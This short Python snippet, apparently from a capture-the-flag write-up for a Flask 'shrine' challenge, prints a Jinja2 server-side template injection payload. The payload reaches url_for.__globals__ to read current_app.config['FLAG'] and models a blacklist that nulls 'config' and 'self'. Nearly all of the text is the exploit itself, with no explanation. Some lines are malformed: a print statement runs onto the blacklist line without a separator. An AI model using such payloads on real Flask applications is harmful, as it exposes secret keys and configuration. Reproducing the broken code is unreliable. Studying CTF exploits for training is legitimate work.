# -*- coding: UTF-8 -*-
s="/shrine/{{ url_for.__globals__['current_app'].config['FLAG']}}"
s = s.replace('(','[').replace(')',']')
blacklist =['config','self']print(''.join(['{{% set {}=None%}}'.format(c)for c in blacklist])+ s)
代碼2:
# -*- coding: UTF-8 -*-
s="/shrine/{{ url_for.__globals__['current_app'].(config)['FLAG']}}"
s = s.replace('(','[').replace(')',']')
blacklist =['config','self']print(''.join(['{{% set {}=None%}}'.format(c)for c in blacklist])+ s)